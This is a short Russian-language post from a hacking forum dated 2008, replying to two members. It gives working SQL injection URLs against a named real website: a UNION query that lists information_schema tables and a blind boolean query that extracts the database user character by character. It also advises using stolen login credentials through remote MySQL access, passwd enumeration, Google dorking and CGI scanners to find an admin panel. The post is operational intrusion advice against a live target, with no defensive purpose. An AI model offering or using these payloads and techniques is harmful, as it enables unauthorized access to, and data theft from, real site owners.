15.06.2008, 10:38
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
gisTy, в таком случае помогают логические запросы
например доступ к information_schema у тебя есть
Код:
http://www.beka.ru/php/content.php?id=1614+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables/*
и есть подзапросы
Код:
http://www.beka.ru/php/content.php?id=1614+and+ascii(lower(substring(user(),4,1)))=53/*
Imperou$, смотря откуда ты выдрал логин и пасс, если сайтов действительно много, большая вероятность удаленного подключения к серверу mysql, если не поможет поищи различные службы через passwd. если движок на сайте публичный можешь через гугл найти путь до админки, если не публичный помогут cgi-сканеры; тем более если на сайте есть новости значит их кто то добавляет) а вообще из названия таблицы обычно понятно к чему подходит логин:пароль)
|
|
|